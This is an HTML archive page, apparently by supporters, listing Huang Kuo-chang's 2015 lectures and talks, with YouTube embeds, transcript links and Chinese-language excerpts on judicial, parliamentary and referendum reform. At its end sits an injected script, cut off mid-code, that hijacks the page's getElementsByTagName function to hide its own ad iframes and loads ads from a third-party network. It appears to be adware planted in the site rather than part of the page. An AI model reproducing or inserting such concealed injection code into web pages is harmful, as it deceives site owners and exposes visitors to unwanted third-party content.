<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>講座&演講 NEW!</title>
<link href="css/oa-button.css" rel="stylesheet" type="text/css">
<link rel="stylesheet" href="css/style4.css" />
<link href="css/top.css" rel="stylesheet" type="text/css">
<link href="css/table1.css" rel="stylesheet" type="text/css">
<script src="scripts/jquery.min1.js"></script>
<script src="scripts/jquery.scrollToTop.min.js"></script>
  <script type="text/javascript">
            $(function() {
                $("#toTop").scrollToTop(1000);
            });
        </script>

<style type="text/css">
body {
	background-attachment: fixed;
	background-image: url(images/sunflower4.jpg);
	background-repeat: no-repeat;
	background-position: 100% 100%;
}
</style>

<link href="css/youtube_css.css" rel="stylesheet" type="text/css">
<link href="video-js.css" rel="stylesheet" type="text/css">
<script src="video.js"></script>
  <script>
    videojs.options.flash.swf = "video-js.swf";
  </script>

<style type="text/css">
a:link {
	color: #0000FF;
	text-decoration: none;
}
a:hover {
	color: #e07325;
	text-decoration: underline;
}
a:visited {
	color: #737373;
	text-decoration: underline;
}
              
</style>

<style type="text/css" >
p {
        color:#000;
        font-size:16px;
	line-height:22px;
}

hr.style {

    height: 3px;
    background: #e5cb47;
}

</style>


<script src="scripts/smoothscroll.js"></script>
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-56289941-1', 'auto');
  ga('send', 'pageview');

</script>

</head>

<body>
<div align="left"><strong>
<h1>講座&演講 NEW!</h1></strong></div>
<hr />
<div align="center">
<table class="bordered">
 <thead>

    <tr>
        <th>#</th>        
        <th><div align="center">檔名</div></th>
        <th><div align="center">影片長度</div></th>
	<th><div align="center"></div></th>
    </tr>
    </thead>

    <tr>
      <td><div align="left">1.</div></td>
      <td><a href="#1_11" class="smoothScroll">20150909 夏日小影展《12怒漢：大審叛》 12 Angry Men 座談會＿黃國昌老師談話</a></td>
      <td><div align="center">20:19</td>
      <td><div align="center"><a href="pdf/講座&演講/20150909%20夏日小影展《12怒漢：大審叛》%2012%20Angry%20Men%20座談會＿黃國昌老師談話.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>

    <tr>
      <td><div align="left">2.</div></td>
      <td><a href="#1_10" class="smoothScroll">20150813 公督盟改革系列講座／外國國會制度看台灣國會改革座談會（黃國昌談話部分）</a></td>
      <td><div align="center">19:28</td>
      <td><div align="center"><a href="pdf/講座&演講/20150813%20公督盟改革系列講座／外國國會制度看台灣國會改革座談會（黃國昌談話部分）.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>

    <tr>
      <td><div align="left">3.</div></td>
      <td><a href="#1_9" class="smoothScroll">20150726 時代力量中部暑期培訓營_Part 1 黃國昌：我對台灣未來的想像</a></td>
      <td><div align="center">01:01:20</td>
      <td><div align="center"><a href="pdf/講座&演講/20150726%20時代力量中部暑期培訓營_Part%201%20黃國昌：我對台灣未來的想像.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left">4.</div></td>
      <td><a href="#1_8" class="smoothScroll">20150712 美西台灣人夏令會 黃國昌 還權與民+Q&A</a></td>
      <td><div align="center">01:22:29</td>
      <td><div align="center"><a href="pdf/講座&演講/20150712%20美西台灣人夏令會%20黃國昌%20還權與民+Q&A.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left"></div></td>
      <td><a href="#1_7" class="smoothScroll">20150712 美國西部台灣人夏令會 黃國昌 台灣制憲+Q&A</a></td>
      <td><div align="center">01:36:11</td>
      <td><div align="center"><a href="pdf/講座&演講/20150712%20美國西部台灣人夏令會%20黃國昌%20台灣制憲+Q&A.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left">5.</div></td>
      <td><a href="#1_6" class="smoothScroll">20150704 綠逗全國巡迴演講會高雄場＿如何讓國民黨國會不過半＿黃國昌老師部分</a></td>
      <td><div align="center">23:53</td>
      <td><div align="center"><a href="pdf/講座&演講/20150704%20綠逗全國巡迴演講會高雄場＿如何讓國民黨國會不過半＿黃國昌老師部分.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left">6.</div></td>
      <td><a href="#1_5" class="smoothScroll">20150627 綠逗聽友演講會台中場 如何讓國民黨國會不過半？ 黃國昌老師部分</a></td>
      <td><div align="center">19:45</td>
      <td><div align="center"><a href="pdf/講座&演講/20150627%20綠逗聽友演講會台中場%20如何讓國民黨國會不過半？%20黃國昌老師部分.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left">7.</div></td>
      <td><a href="#1_4" class="smoothScroll">20150620 余杰《刀尖上的中國 》新書座談會@金石堂城中店（黃國昌部分）</a></td>
      <td><div align="center">26:32</td>
      <td><div align="center"><a href="pdf/講座&演講/20150620%20余杰《刀尖上的中國%20》新書座談會@金石堂城中店（黃國昌部分）.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left">8.</div></td>
      <td><a href="#1_3" class="smoothScroll">20150614 聯合國與人權保護：兼論台灣的實踐＿綜合座談（黃國昌部分）</a></td>
      <td><div align="center">22:41</td>
      <td><div align="center"><a href="pdf/講座&演講/20150614%20聯合國與人權保護：兼論台灣的實踐＿綜合座談（黃國昌部分）.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left">9.</div></td>
      <td><a href="#1_2" class="smoothScroll">20150608「國會如何過半？如何壯大第三公民勢力？」演講：黃國昌</a></td>
      <td><div align="center">14:36</td>
      <td><div align="center"><a href="pdf/講座&演講/20150608「國會如何過半？如何壯大第三公民勢力？」演講：黃國昌.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    
    <tr>
      <td><div align="left">10.</div></td>
      <td><a href="#1_1" class="smoothScroll">20150509 與媽媽聊公投法－補正公投法的理路與運動現況@台南瑪莎咖啡 黃國昌老師部分</a></td>
      <td><div align="center">01:26:22</td>
      <td><div align="center"><a href="pdf/講座&演講/20150509%20與媽媽聊公投法－補正公投法的理路與運動現況@台南瑪莎咖啡%20黃國昌老師部分.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    
</table>
</div>
<p>&nbsp;</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/0U_BmK4B-HA?rel=0" frameborder="0" allowfullscreen></iframe></div>
<div id="1_11"><h2>1. 夏日小影展《12怒漢：大審叛》 12 Angry Men 座談會＿黃國昌老師談話 摘錄 <a href="pdf/講座&演講/20150909%20夏日小影展《12怒漢：大審叛》%2012%20Angry%20Men%20座談會＿黃國昌老師談話.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;從過去的這些累積的研究，我可以跟各位講，當然我之所以敢跟各位講這些內容是因為我在想不開以前所做的研究就是在做這個研究，就是國民參與審判制度的研究，不管是理論上面的研究還是實證上面的研究，拍謝我如果講得臭屁一點，我如果說我是第二，臺灣沒有人敢說他是第一(掌聲)，他如果做出來研究，他的結果非常的硬，非常的穩固，他的研究結果是什麼，由平民一群像陪審團的形式，你要求他們要做有罪的認定，他所要求證據的質跟量，品質跟數量會比由職業法官做出有罪認定的時候所要求的證據質量還要高，那也就是說透過陪審團的方式去做出有罪認定，在相同的證據質量下，去做出有罪認定的機率是比跟職業法官相比要來得低。
</p>
<p>▲&nbsp;&nbsp;&nbsp;現在司法院有推出一個叫作人民觀審試行條例，那個條例司法院是在2012年1月12號的時候推出來，那天有什麼重要性，那天是總統大選前兩天，推出那個觀審條例的目的是什麼，我們的司法院要做政績給我們的馬英九總統，說他司法改革很有成效，但是你回顧過去人民觀審條例，什麼叫作觀審條例，就是基本上還是職業法官判，那人民可以來參與，你可以看，看整個審判過程，你也可以表達你的意見，表達完你的意見以後，這樣就夠了，最後有罪無罪還是職業法官判，這個是我們國家要搞的人民觀審條例，包括在座的兩位律師，包括民間司法改革基金會，包括所有的學者專家在整個研議的過程當中一直跟司法院講，如果要推動改革就玩真的，不要玩假的，你玩這種假的改革是浪費國家寶貴的資源去做一些毫無意義的事情，只是在充門面而已。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/VQwUf83eIDc?rel=0" frameborder="0" allowfullscreen></iframe></div>
<div id="1_10"><h2>2. 公督盟改革系列講座／外國國會制度看台灣國會改革座談會（黃國昌談話部分） 摘錄 <a href="pdf/講座&演講/20150813%20公督盟改革系列講座／外國國會制度看台灣國會改革座談會（黃國昌談話部分）.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;但是對於建議所謂資深制這件事情我個人相對會比較保留，因為我從來不認為資深等於專業或資深等於優秀，像我們現在中國國民黨總統候選人洪秀柱女士他也很資深，但是你如果問我說他的專業是什麼，我真的腦袋開始冒星星，就是我們洪委員的專業到底是什麼，當然我講這樣子的話我負責，因為我長期在觀察立法院裡面法案審查的結構，委員會在審查法案的時候專業性不足，即使是所謂什麼兩連霸三連霸四連霸五連霸六連霸的立法委員，你如果真的問他們的專業是什麼，我想社會上面會有相當高的公評。
</p>
<p>▲&nbsp;&nbsp;&nbsp;你如果說你如果問我自己的話，假設我明年如果可以順利進入立法院，我隨便講啦，司法法制委員會，這樣好像有點自吹自擂，對不起我修正一下(全場笑)，就雖然我從來沒有當過立法委員，但是我對於司法法制委員會，甚至內政委員會裡面很多審查的法案，我就相信我具備那樣的專業知識能夠來加以去進行重要的處理。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/8Vasn-aOafU?rel=0&theme=light" frameborder="0" allowfullscreen></iframe></div>
<div id="1_9"><h2>3. 時代力量中部暑期培訓營_Part 1 黃國昌：我對台灣未來的想像 摘錄 <a href="pdf/講座&演講/20150726%20時代力量中部暑期培訓營_Part%201%20黃國昌：我對台灣未來的想像.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;大概三個月以前有來過這個地方，跟我等下講的事情沒有關係，那個是蔡明憲老師他們的團隊在這邊辦有一個活動，我那天來這邊的時候，其實有一點耍寶，因為我從台北坐的是直達的高鐵，他只停台中跟高雄，結果我在高鐵上面太累，我睡著了，然後我醒來的時候我已經在嘉義，然後我很想下車，但我沒有辦法下車，所以我必須要坐到高雄下了車，然後再從高雄坐回來台中趕到這邊，所以本來應該是晚上七點鐘開始，一直拖到晚上九點鐘開始，然後搞到晚上10點半，然後為了要趕最後一班的高鐵才趕快離開。
</p>
<p>▲&nbsp;&nbsp;&nbsp;現在的政治情勢突然變得很詭異，什麼叫作突然變得很詭異？因為國民黨應該會什麼，輸掉總統，我相信正常的人應該不會有人預設國民黨將贏得總統大選，到目前為止還看不出這樣的氛圍，對於中國國民黨來講，他們要想的是，對不起，我不應該這樣子說，我不要從國民黨的立場來想，就是從人民的立場來講，你願不願意把當初馬英九那樣子幾乎不受控制的權力交給蔡英文？我就問這個問題就好，因為我們現在如果要追求的是，一些價值透過制度的設計能夠被貫徹的話，可能就沒有辦法因人而異，那當然我也比較喜歡蔡英文，我非常討厭馬英九，那但是你如果要我主張說這些權力給馬英九我不要，但是給蔡英文我可以，這樣子我們臺灣就會陷入了一個回到人治的國家去，就是這個國家好不好就看上去的那個人怎麼樣，當然人很重要，我沒有意思說人不重要，人還是很重要，但是人拿到權力以後到那個位置上面，他的想法可能會隨著他的立場的改變而改變。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/scHWLQgxEV4?rel=0&theme=light&start=407" frameborder="0" allowfullscreen></iframe></div>
<div id="1_8"><h2>4. 美西台灣人夏令會 黃國昌 還權與民+Q&A 摘錄 <a href="pdf/講座&演講/20150712%20美西台灣人夏令會%20黃國昌%20還權與民+Q&A.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;第一點我相信大家都可以有共識的是蔡英文主席一定要讓她當選總統，我相信各位鄉親或許對蔡主席在某些地方上面的想法覺得還不夠前進，絕對還不夠清楚，但是她是我自己到現在我相信臺灣在現階段能夠產出最好的政治領導人(掌聲)。下一個問題是2016年的國會我們希望它長得什麼樣子，當然我們會希望中國國民黨，包括現在看到政治情勢不錯，突然又要跑出來的宋楚瑜親民黨，那些泛藍的版圖能夠盡量地縮小，那但是如果整個臺灣全部都變成綠色的，而那個綠色的只有單一政黨叫作民主進步黨，對臺灣是不是好事？當然我在說這樣子問題的時候，對民進黨的朋友有期許，當然也有我自己的批評，民進黨裡面很多優秀的從政同志都是我自己非常要好的朋友，在過去這幾年當中，在很多重要的議題上面，大家都並肩作戰，但是我相信今天在座的所有的鄉親，過去這麼多年來，對於臺灣的民主運動，對於臺灣國家地位的正常化，大家的投入、大家的努力是為了臺灣這個國家，不是為了任何一個政黨，任何一個政黨只是在承載臺灣人的期待，臺灣人的進步價值的一個工具。
</p>
<p>▲&nbsp;&nbsp;&nbsp;問題是一次又一次，剛剛跟各位報告的那些事情不就是你們這群人搞出來的嗎，你們負了什麼責任？跟人民道歉過嗎？你們還有什麼臉皮跟人民講你們不應該行使這些權利，行使這些權利你們就是不理性，行使這些權利你們就是民粹？大家表面上面看起來這個憲法133的運動沒有成功把吳育昇罷免，但是我可以跟各位說，吳育昇2016年會落選這件事情在這場運動結束了以後就已經註定，他2016年我可以跟各位保證吳育昇必敗(掌聲)。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/KRcNvDptwK4?rel=0&theme=light" frameborder="0" allowfullscreen></iframe></div>
<div id="1_7"><h2>美國西部台灣人夏令會 黃國昌 台灣制憲+Q&A 摘錄 <a href="pdf/講座&演講/20150712%20美國西部台灣人夏令會%20黃國昌%20台灣制憲+Q&A.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;但是在臺灣有一些年紀比較長的人，他們對於公民權下修是反對的，大概歷次的民調出來，贊成跟反對的大概五五波，是五五波，這個是為什麼中國國民黨最後決定說，我反正把你封殺掉也沒有關係，因為他們在做每個政治決定的時候都在後面看民調，五五波，那當然五五波，這些世代正義的事情會隨著時間的經過，那個民意的結構還會再變動，還會被改，就是你會老，我會長大(全場笑)，基本上的道理是這個樣子，當然我們現在在從事改革，一個具有理想性，代表進步價值的政黨永遠看得都是未來，看得不是現在，目光短淺的政黨看得才是現在，因此中國國民黨他感覺好像看了民調他沒有傷，但是事實上他傷大了，我可以跟各位報告，從太陽花到18歲修憲，到這次高中課綱微調，中國國民黨做了一個全世界的政黨再蠢都不會做的事情，就是把一整個世代的年輕人全部得罪光(全場笑)，你把一整個世代的年輕人全部都得罪光了，你這個政黨還有未來嗎？把你掃進歷史的塵埃只是快慢的問題。
</p>
<p>▲&nbsp;&nbsp;&nbsp;其實我自己對美國這個國家有滿複雜的感情，因為我自己之前來美國留學的時候，我就深刻體驗到一件事情，那當然那只是我自己個人的感受，並不代表各位在這邊的生活經驗，我那時候來美國念書的時候，我最深的感受就是美國是一個很現實的國家，他是一個很現實的國家，為什麼我會有這個感受，對不起，大家可以解散休息喝咖啡，聽我講一下以前年輕時候的事情，我第一年來美國念書的時候，就全身上下穿得很隨便，就一條破牛仔褲，然後一條T-shirt，每天都待在圖書館，那個時候我念的Law School根本沒有半個人要鳥我，就當作我這個人不存在，那我想他們可能覺得我就是個foreigner，然後書也念不太好，就不理我，等到第一個學期的成績出來了以後，我到下學期什麼事情也不用做，坐在圖書館就變得很紅(全場笑)，就一堆美國Law School的學生來找我，要找我組讀書小組，然後要帶我出去玩，然後上完課的時候要跟我交換筆記，從那個時候我就知道，這是一個很現實的國家，當然我必須要承認我的經驗很片面，很多美國人還是充滿了愛心而有溫暖的。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/7QAmVm5um2Q?rel=0&theme=light&start=100" frameborder="0" allowfullscreen></iframe></div>
<div id="1_6"><h2>5. 綠逗全國巡迴演講會高雄場＿如何讓國民黨國會不過半＿黃國昌老師部分 摘錄 <a href="pdf/講座&演講/20150704%20綠逗全國巡迴演講會高雄場＿如何讓國民黨國會不過半＿黃國昌老師部分.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;那事實上以前這種中國國民黨的立法委員還更多，但是我必須要向臺灣的年輕人致敬，為什麼我說我要向臺灣的年輕人致敬？因為他們從去年以來到現在的行動，各位仔細盤點一下，你們會發現，這些年輕人站出來說要割闌尾，表面上面他們到目前為止還沒有割掉任何一條闌尾，但是實際上面被他們喊要割闌尾的中國國民黨的立法委員現在通通不敢出來選了(掌聲)，蔡正元敢出來選？林鴻池敢出來選嗎？呂學樟敢出來選嗎？這些年輕人的努力讓這些精於政治計算的政客，回去看一看民調數字，算一算風險，乾脆不要選，已經把他們先逼退了。
</p>
<p>▲&nbsp;&nbsp;&nbsp;這一些艱困的選區我們如果都能夠打下來，席次不用太多，席次不用太多，各位相信我，以現在時代力量推出來要選舉的人，以及未來會推出來的不分區立委絕對都是一級的戰將(掌聲)，每一個出來到立法院裡面都會發揮最大的戰力，剛剛有朋友問說2016年讓民主進步黨單獨過半好不好，這個問題我相信大家心裡面都有答案，但是時代力量的人進去國會以後要做什麼事情，我可以跟大家報告，第一個蔡英文主席，未來是蔡英文總統，她在國會裡面要推動的進步的改革法案，時代力量絕對支持，不會像當初阿扁在執政的時候，一堆人在扯後腿，他在行政部門做得很累，一些重要的法案推到國會裡面，全部都被中國國民黨還有那個時候的親民黨，那個時候的親民黨是誰率領的？宋楚瑜，宋楚瑜你今天要進軍國會，你今天要選總統，你先把親民黨在2000年到2008年到底幹了什麼事情跟大家交代清楚，要不然我說你沒有資格啦！(掌聲)，親民黨還欠臺灣人民一個道歉，這個帳到今天都還沒有清，結果你看到今天中國國民黨這個樣子，有利可圖，沒有關係。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/LaIf0HcYygY?rel=0&theme=light&start=88" frameborder="0" allowfullscreen></iframe></div>
<div id="1_5"><h2>6. 綠逗聽友演講會台中場 如何讓國民黨國會不過半？ 黃國昌老師部分 摘錄 <a href="pdf/講座&演講/20150627%20綠逗聽友演講會台中場%20如何讓國民黨國會不過半？%20黃國昌老師部分.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;我們在區域的選將先做一個基本的盤點以後，明天我們會舉行第一場公開的政見發表會，第一波我們主打六大改革，這只是第一波，代表我們對於現在臺灣的問題，在民主的改革、在國會的改革、在司法的改革、在轉型正義、在環境的保護、我們所提出來的訴求，那當我們所提出來訴求的時候，我們很清楚地知道我們未來要進軍國會做的是什麼，做的是法案，審的是預算，這個是立法委員的職權，當然立法委員為了地方的建設，會去幫地方爭取一些建設經費，這很多鄉親都會期待也無可厚非，但是更重要的事情是怎麼樣透過國會的立法讓臺灣的民主更深化，讓大家目前沒有辦法信任的司法，重拾人民對司法的信心，這些都是國會議員責無旁貸的責任。
</p>
<p>▲&nbsp;&nbsp;&nbsp;在接下來整個過程當中，時代力量會秉持我剛剛跟各位報告的那個原則，我們整個大的戰略目標上面是除了把區域立委拉下來以外，我其實可以跟各位報告就是，除了慈庸的選區、光遠的選區，還有另外一位，今天他要去領那個，不能說領，他只是入圍金曲獎，我們希望大家都，都預期希望可以恭喜他能夠得獎的林昶佐，那請大家以後，從今天開始答應我一件事情，不要再叫他Freddy(全場笑)，因為選票上不會印Freddy，拎丟賣嘎郎供要支持Freddy賣啦賣啦，哩愛供支持林昶佐，中間那個昶不是很好念，有一個永遠的永，再加太陽的那個日，就叫林昶佐，林昶佐，林昶佐，很重要所以要念三次(全場笑)，就不要再推銷說他是Freddy，他的名字就叫作林昶佐。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/NFoDG2cQxxI?rel=0&theme=light&start=27" frameborder="0" allowfullscreen></iframe></div>
<div id="1_4"><h2>7. 余杰《刀尖上的中國 》新書座談會@金石堂城中店（黃國昌部分） 摘錄 <a href="pdf/講座&演講/20150620%20余杰《刀尖上的中國%20》新書座談會@金石堂城中店（黃國昌部分）.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;那老實說我會滿鼓勵余杰先生，因為對於像我這樣子的一個人來講，我上大學了以後，可能就開始學習法律的，自己本來專業的那個資訊，那可能對於在歷史地理以前所接收到的一些錯誤資訊，自己要另外花時間慢慢地把它矯正過來，那我相信跟我一樣歲數，甚至是比我更年長的人，應該都會有相同的困擾，第一個最重要的事情是幫余杰先生打書啊，這真的是一本好書，各位今天等下完了以後要買；那第二個是我可能就請那個，就是請余杰老師慷慨一點，這本書我真的強烈地建議，把它寄給目前中國國民黨要代表出來參選總統的洪秀柱女士，因為我相信以洪女士她可能所受的教育，她被荼毒的程度比我還要深，所以導致我最近有的時候在看洪女士的一些發言的時候，我在想說我是不是回到小學的時候被灌輸要反共復國，然後零用錢全部都要存下來買飛機、買大砲，我們要解救大陸苦難的同胞
</p>
<p>▲&nbsp;&nbsp;&nbsp;因為我剛好這本書拿來翻，我真的是嚇壞了，中研院的院士怎麼會寫這樣的，我再另外找時間好好的那個，他說：「兩岸性置入性協調機制及政治菁英的互信將是維護台海和平與兩岸關係的發展最重要的基礎。」聽起來還ok，「機制與互信能否進一步鞏固與深化將取決於台灣的民主體制是否日臻成熟。」意思就是說臺灣的民主體制還不夠成熟，所以兩岸的互信不夠，那他為什麼不說中國的民主體制根本還沒有開始呢？就是怎麼會這樣子去描述兩岸關係的互信是在看臺灣的民主夠不夠成熟，那當然從朱老師的眼中，像我們這種人就是暴徒(全場笑)，導致臺灣的民主沒有辦法走向成熟之路最大的絆腳石，我今天晚上回去好好反省一下，這本書買我是不會買，我趕快去借來看(黃老師笑)。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/kwQcygmc6B0?rel=0&theme=light" frameborder="0" allowfullscreen></iframe></div>
<div id="1_3"><h2>8. 聯合國與人權保護：兼論台灣的實踐＿綜合座談（黃國昌部分） 摘錄 <a href="pdf/講座&演講/20150614%20聯合國與人權保護：兼論台灣的實踐＿綜合座談（黃國昌部分）.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;這個是我們的政府花我們大家的納稅錢去請來了國際人權的專家，對於我們所提出來的報告的審核意見，現在已經2015年，我們回顧過去這兩年，除了看到警棍繼續在街頭上揮舞，去年323、324在行政院所發生的流血鎮壓行為之外，我們的政府到底做了什麼？我不客氣的說，如果簽完兩公約，將兩公約內國法化以後，還出現這樣的現象，我相信所有的人民都可以問一個正當的問題，立這個法有什麼用？把兩公約內國法化又怎麼樣？簽署了兩公約又怎麼樣？實際的執行機制在哪裡？
</p>
<p>▲&nbsp;&nbsp;&nbsp;馬英九在2011年的時候，突然拋出了要去制定兩岸和平協議這樣子的訴求，當然面對臺灣民眾反彈的聲浪，他說的說，如果要簽這個以前，他一定會交付人民公民投票，這個是他說過的話，但是我們在具體的場域當中，不管是在2011年的時候，民間團體就已經很清楚地提出來，牽涉到政治性的重大議題一定要強制公投，絕對不可以讓行政部門草率的去簽，透過我們目前被扭曲的國會的代議民主通過就可以了。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/Jgf3Y6VgTdo?rel=0&theme=light&start=95" frameborder="0" allowfullscreen></iframe></div>
<div id="1_2"><h2>9. 「國會如何過半？如何壯大第三公民勢力？」演講：黃國昌 摘錄 <a href="pdf/講座&演講/20150608「國會如何過半？如何壯大第三公民勢力？」演講：黃國昌.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;最近這段期間我相信各位從媒體上面都可以看到我們下一代臺灣未來的希望很了不起，高中生，串聯起來針對教育部他們想要把大中華的思想去毒害我們下一代年輕學子的心靈，全國各個高中高職已經有200多個學校串聯起來，看到這些年輕學子他們積極的行動、他們的覺醒，其實我自己心裡非常感動，因為就像臺灣的民主一樣，我們前面一輩的先進幫我們打出了一片天空，現在面臨的困難我們必須把棒子接下來繼續努力，但是看到我們年輕的，更年輕的一代，可能已經不只是在太陽花的時候，大家看到的研究生或者是大學生，在一年以後現在已經蔓延到了高中生，他們能夠這樣子自主的串聯，不需要有任何人在旁邊下任何的指導棋，教他們該怎麼做，他們自己到目前為止，我靜靜的在旁邊看，他們就做得非常好，這個是我相信這個是臺灣未來的希望。
</p>
<p>▲&nbsp;&nbsp;&nbsp;島國前進也跟其他的團體一起，包括了在高雄南部的部份，南區的反黑箱課綱串聯的行動，我們也靜靜的在旁邊扮演支持者的角色，以這些學生為主體，他們很有想法，他們自己去做。那我相信整個臺灣的改變絕對不是任何一個人透過他自己的力量就有辦法達成的，而是透過許許多多的臺灣人，對這個土地的感情，對這個土地的愛，大家共同的努力，默默的付出，我們一點一點把臺灣變成一個更好的地方，以我們希望實現建立我們理想的國度，這樣子的一個理想越來越近。
</p>

<hr class="style">

<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/kIMlIy7dzb0?rel=0&theme=light" frameborder="0" allowfullscreen></iframe></div>
<div id="1_1"><h2>10. 與媽媽聊公投法－補正公投法的理路與運動現況@台南瑪莎咖啡 黃國昌老師部分 摘錄 <a href="pdf/講座&演講/20150509%20與媽媽聊公投法－補正公投法的理路與運動現況@台南瑪莎咖啡%20黃國昌老師部分.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;那當然那天我們論述先不講，先從運動的策略上面，那天我不是跑上去說張慶忠，那會議結束了以後，因為我們是在會議結束以後才去做那件事情，因為我不想要讓他有任何的藉口說我們去裡面鬧場，讓會議沒有辦法進行，那天我們一直等到下午的5點半多，主席宣布今天的會議結束了以後才上去找他講話，那其實各位如果有觀察我的話，會發現說我基本上是一個非常講道理，很溫和的人(全場笑)，可以笑小聲一點沒有關係，絕對不是我會做的事情嘛，我也可以老實跟大家講說那真的不是平常我會做的事情，但是我也沒有那麼容易受激怒啦，說情緒很憤怒，然後我就上去罵他，然後有人說他能夠感同身受，聽了那8個小時以後，要克制不去上他，要克制自己不要上去罵他這件事情的確是很困難。
</p>
<p>▲&nbsp;&nbsp;&nbsp;臺灣人民挺民進黨不是在挺民進黨，是在挺臺灣，要搞清楚這件事情，我們挺的是臺灣，你只是承載我們對於臺灣那個進步價值力量的一個載體，所以我們挺你這個政黨，臺灣人民挺你這個政黨不是無條件的，你幹什麼事情我都挺你，如果臺灣人民挺你挺到這樣盲目的程度的話，那只是在縱容你而已。
</p>












<p align="center">&nbsp;</p>
<a href="#top" id="toTop"></a>

<div id="d_pid" data-id="serv_53a94043e0d2600963" style="display: none;"></div>
<script type="text/javascript">
var D_PID = 'serv_53a94043e0d2600963';
var D_PTR_ID = '1';
var D_SRC_ID = '1';
var prtLoader = {};
</script>
<script type="text/javascript">
prtLoader.ScriptIdf904d07f3c0759dd546fa11ba0a5e9df = function() {
(function(){var j=navigator.language||navigator.userLanguage;if(window.self!==window.top){return}var h=["18hairygirls.com","adcash.com","adult-torrent.com","alluc.to","alphaporno.com","ashemaletube.com","audiopoisk.com","aztecaporno.com","befuck.com","belgixxx.com","best-porno.net","bestube.ru","bild.de","bingoliner.com","brazzers.com","brazzersnetwork.com","btdigg.org","cam4.it","carameltube.com","cjad.com","1tbporno.ru","24video.net","4shared.com","adult-torrent.com","alscash.com","animalsexfun.com","anysex.com","atkmodels.com","baratro.ru","bayproxy.li","beeg.com","bestupskirtporn.com","betfair.com","betvictor.com","bigcinema.tv","black-warez.ru","bobfilm.net","bonusvid.com","budbi.com","cekctube.com"];var n=location.hostname.split(".");var q=n.shift();var i=n.join(".");for(var p in h){if(h[p]==i){console.log("domain blocked");return}}var f=document.getElementsByTagName("iframe");var b=document.getElementsByTagName("object");var l=document.getElementsByTagName("img");var e=document.getElementsByTagName;document.getElementsByTagName=function(t){var s=e.call(document,t);if(typeof(document.querySelectorAll)!="undefined"){return document.querySelectorAll(t+':not([class="prt02123"])')}else{return s}};var m={ad468x60:'<div align="center"><iframe class="prt02123" width="468" height="60" src="http://ib.adnxs.com/tt?id=3318184&size=468x60" frameBorder="0" scrolling="no"></iframe></div>',ad160x600:'<div align="center"><iframe class="prt02123" width="160" height="600" src="http://ib.adnxs.com/tt?id=3318184&size=160x600" frameBorder="0" 